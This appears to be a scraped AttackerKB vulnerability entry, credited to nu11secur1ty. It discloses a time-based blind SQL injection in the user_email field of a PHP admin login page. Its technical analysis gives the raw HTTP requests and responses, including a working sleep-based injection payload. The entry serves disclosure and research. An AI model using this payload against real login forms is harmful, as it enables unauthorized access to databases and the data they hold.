Attacker Value
Very High
3
CVE-nu11-101821
3
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
3
CVE-nu11-101821
Last updated October 18, 2021 ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
MITRE ATT&CK
Select the MITRE ATT&CK Tactics that apply to this CVE
Collection
Select any Techniques used:
Command and Control
Select any Techniques used:
Credential Access
Select any Techniques used:
Defense Evasion
Select any Techniques used:
Discovery
Select any Techniques used:
Execution
Select any Techniques used:
Exfiltration
Select any Techniques used:
Impact
Select any Techniques used:
Initial Access
Select any Techniques used:
Lateral Movement
Select any Techniques used:
Persistence
Select any Techniques used:
Privilege Escalation
Select any Techniques used:
Topic Tags
Select the tags that apply to this CVE (Assessment added tags are disabled and cannot be removed)
What makes this of high-value to an attacker?
What makes this of low-value to an attacker?
Description
Description:
The user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind.
A single quote was submitted in the user_email parameter, and a general error message was returned.
Two single quotes were then submitted and the error message disappeared.
Add Assessment
1
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
CVE-nu11-101821
Vendor
MySQL Request-1:
POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e
MySQL Response-1:
Response 1 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:37 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 7099 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... <b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28 Stack trace: #0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...') #1 {main} thrown in <b> ...[SNIP]...
MySQL Request-2:
POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e
MySQL Response-2
HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:40 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6832 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]...
MySQL Request-3
POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e
MySQL Response-3
HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:51 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6811 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]...
Reproduce
Proof:
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
Offensive Application
exploit
Utility Class
privesc
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
nu11secur1ty
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
nu11secur1ty
References
Additional Info
Authenticated
Always
Exploitable
Always
Reliability
Very Weak
Stability
Very Weak
Available Mitigations
Very Weak
Shelf Life
Very Short
Userbase/Installbase
Very Small
Patch Effectiveness
Very Low
Rapid7
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
